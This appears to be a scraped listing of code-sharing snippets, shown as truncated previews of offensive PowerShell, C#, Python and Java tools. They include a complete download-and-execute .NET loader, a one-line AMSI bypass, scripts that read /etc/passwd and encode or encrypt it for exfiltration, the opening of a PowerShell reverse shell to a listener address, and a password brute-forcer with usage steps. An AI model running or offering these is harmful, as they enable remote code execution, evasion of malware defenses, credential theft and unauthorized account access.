This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$url = "http://server/dotnetexecutable" | |
$data = (New-Object System.Net.WebClient).DownloadData($url); | |
$assem = [System.Reflection.Assembly]::Load($data); | |
$main = $assem.EntryPoint | |
$main.Invoke(0, @(,[string[]]@("args0"))); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Runtime.InteropServices.Marshal]::Copy([Int32[]]@(0), 0,(([Ref].Assembly.GetTypes()|?{$_.Name -like "*iUtils"}).GetFields('NonPublic,Static')|?{$_.Name -match "Context"}).GetValue($null), 1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const { refactor } = require('shift-refactor'); | |
const { commonMethods } = require('refactor-plugin-common'); | |
const Shift = require('shift-ast'); | |
const fs = require('fs'); | |
const src = ` | |
var a = "aap"; | |
function foo() { | |
function bar() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell "$sql='SELECT @@VERSION';$c=(New-Object -TypeName System.Data.SqlClient.SqlConnection('server=SERVER;Database=DATABASE;Integrated Security=True;'));$c.open();$q=(New-Object System.Data.SqlClient.SqlCommand($sql,$c));$r=$q.ExecuteReader();$oo=@();while ($r.Read()){$o=(New-Object PSObject);for ($i=0;$i -lt $r.FieldCount;$i++){$n=$r.GetName($i);if($n -eq ''){$n='column_'+$i};$o|Add-Member -type NoteProperty -Name $n -Value $r[$i];}$oo+=$o};$oo|FT -Wrap" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$filepath = "/etc/passwd" | |
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open); | |
$ms = New-Object System.IO.MemoryStream; | |
$aes = [System.Security.Cryptography.Aes]::Create(); | |
$aes.keysize = 128; | |
Write-Host "Key: " (($aes.Key |% ToString X2) -join ''); | |
Write-Host "IV: " (($aes.IV |% ToString X2) -join ''); | |
Write-Host "Mode: " $aes.mode | |
$cs = New-Object System.Security.Cryptography.CryptoStream($ms, $aes.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write); | |
$fs.CopyTo($cs); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$filepath = "/etc/passwd" | |
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open) | |
$ms = New-Object System.IO.MemoryStream; | |
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress); | |
$fs.CopyTo($gzs); | |
$fs.Close(); | |
$gzs.Close(); | |
$ms.Close(); | |
[System.Convert]::ToBase64String($ms.ToArray()); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import codecs | |
import base64 | |
data = '''$lhost="10.0.0.1"; | |
$lport=4444; | |
$MAXCMDLENGTH=65535; | |
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport); | |
$stream = $client.GetStream(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe pshost.cs /r:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | |
using System; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
using PowerShell = System.Management.Automation.PowerShell; | |
internal class InfantAnnihilator | |
{ | |
private static void Main(string[] args) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Referenced sources: | |
# - Mimikatz | |
# - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/5cf2e6b9-3195-4f85-bc18-05b50e6d4e11 | |
# - https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-publickeystruc | |
from io import BytesIO | |
import struct | |
import math | |
import codecs | |
from Crypto.PublicKey import RSA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
- Get the .jar files from the server (check .jnlp file). | |
- Extract those .jar files (unzip). | |
- Place Brutus.java in the same directory. | |
- Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7 Brutus.java | |
- Notice the target & source. Otherwise CORBA can't be found. | |
- Run: java Brutus <accountname> <ascii password file> <target> | |
- Example: java Brutus beheerder passwords.txt xelion.local | |
*/ |